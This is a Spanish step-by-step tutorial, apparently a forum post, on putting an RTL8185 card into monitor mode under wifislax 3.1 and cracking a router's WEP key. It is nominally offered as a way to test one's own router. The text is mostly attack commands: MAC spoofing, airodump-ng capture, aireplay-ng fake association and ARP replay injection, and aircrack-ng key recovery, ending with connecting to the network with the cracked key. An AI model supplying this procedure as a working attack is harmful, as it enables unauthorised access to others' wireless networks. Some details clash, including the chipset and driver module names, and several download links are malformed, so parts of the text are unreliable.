RTL-8185 54M Utilizando la tarjeta de red RTL 8185 54M en modo monitor con la distribucin de Linux wifislax 3.

1, vamos a ver los pasos necesarios para asegurarnos de que tenemos seguro nuestro ruteador. 1.- DESCARGAMOS EL CONTROLADOR ADECUADO DESDE REALTEK: Esta se encuentra en la siguiente ruta: http://www.realtek.com.tw/downloads/downloadsView.aspx?Langid=1&PNid= 1&PFid=1&Level=6&Conn=5&DownTypeID=3&GetDown=false&Downloads=tru e#RTL8185L Ah puedes elegir cualquier servidor http://ftp://66.104.77.130/cn/wlan/rtl8185_linux_26[1].1027.0823.2007.tar.gz http://ftp://152.104.238.19/cn/wlan/rtl8185_linux_26[1].1027.0823.2007.tar.g z http://ftp://61.56.69.18/cn/wlan/rtl8185_linux_26[1].1027.0823.2007.tar.gz NOTA: Guardamos el archivo descargado en la usb para posteriormente copiarlo en wifislax 3.1 2.- UNA VEZ REALIZADA LA DESCARGA PROCEDEMOS A DESCOMPRIMIR Y COMPILAR #tar -xvf rtl8185_linux_26[1].1027.0823.2007.tar.gz #cd rtl8185_linux_26.1027.0823.2007 #./makedrv #./wlan0up 3.- AHORA PROBAMOS QUE REALMENTE YA ESTA LA TARJETA, SI ES EL CASO LO PONEMOS EN MODO MONITOR #iwconfig #ifconfig wlan0 down #ifconfig wlan0 hw ether 11:22:33:44:55:66 #modprobe -r ath_pci #modprobe ath_pci autocreate=monitor #iwconfig wlan0 mode monitor #iwconfig

4.- LO LEVANTAMOS #ifconfig wlan0 up 5.- VAMOS A IDENTIFICAR NUESTRO RUTEADOR #airodump-ng wlan0 Anotamos los datos mnimos necesarios tales como el ESSID,BSSID y MAC. Ahora nos ubicamos adecuadamente en nuestro caso en rate 1 y canal 6 #iwconfig wlan0 rate 1M channel 6 6.- INICIAMOS AIRMON Y VERIFICAMOS QUE YA TENEMOS NUESTRA INTERFACE EN MODO MONITOR #airmon-ng start wlan0 Vemos que nos da el siguiente resultado Interface Chipset Driver wlan0 RTL8187 r8187 (monitor mode enabled) 7.- EMPEZAMOS A CAPTURAR TRAFICO CON AIRODUMP #airodump-ng -w pas6 -c 6 wlan0 Seleccionamos el SSID (INFINITUMXXXX) y la direccion MAC(XX:XX:XX:XX:XX:XX) para verificar la seguridad de nuestro ruteador Dejamos abierta la ventana y en ejecucion airodump 8.- CREAMOS UNA ASOCIACION AP CON AIREPLAY-NG Abrimos un nuevo shell y tecleamos lo siguiente: #aireplay-ng -1 0 -e INFINITUMXXXX -a XX:XX.XX:XX:XX.XX -h 00:11:22:33:44:55 wlan0 En este punto vamos a intentarlo repetidamente hasta que obtengamos el mensaje: Association successful :-) 9.- AHORA INYECTAMOS TRAFICO CON AIREPLAY #aireplay-ng -3 -b XX:XX.XX:XX:XX.XX -h 00:11:22:33:44:55 wlan0 Vemos que se empiezan a enviar y recibir paquetes

Y si checamos la ventana donde esta trabajando airodump se ve que se empiezan a generar los IV's, aqui esperamos hasta llegar unos 160,000 aproximandamente 10.- VAMOS A SACAR LA CLAVE CON AIRCRACK Revisamos que este el archivo .cap en la ruta actual #ls #cd rtl8185_linux_26.1027.0823.2007 (el mio se quedo aqu) #aircrack-ng pas6-01.cap Seleccionamos el router : 1 INFINITUMXXXX Y en unos instantes obtenemos el key: KEY FOUND [34:67:34:65:75] 11.- INTRODUCIMOS LA CLAVE A NUESTRA TARJETA No deberia de ser asi pero desafortunadamente nicamente reiniciando la PC es que podremos conectarnos. 12.- OBTENEMOS UNA IP Y VEMOS CUAL NOS ASIGN Volvemos a cargar los controladores segun lo descrito en el paso 2 y despues Conectarnos con: wifislax-asistencia herramientas-wireless wifislax Introducimos la el dispositivo: wlan0 canal: 6 (o segun el caso) clave: 3467346575 Wifislax-asistencia redes dchp (elegimos la wlan0) elegimos la red, seguimos las indicaciones y nos conectamos

#ifconfig wlan0 13.- POR ULTIMO VERIFICAMOS CON PING Y A DISFRUTAR DE INTERNET #ping www.google.com.mx NOTA: Todos los pasos anteriores fueron comprobados en pcs con diferentes caracteristicas con el mismo live cd de wifislax 3.1 obteniendo siempre los mismos resultados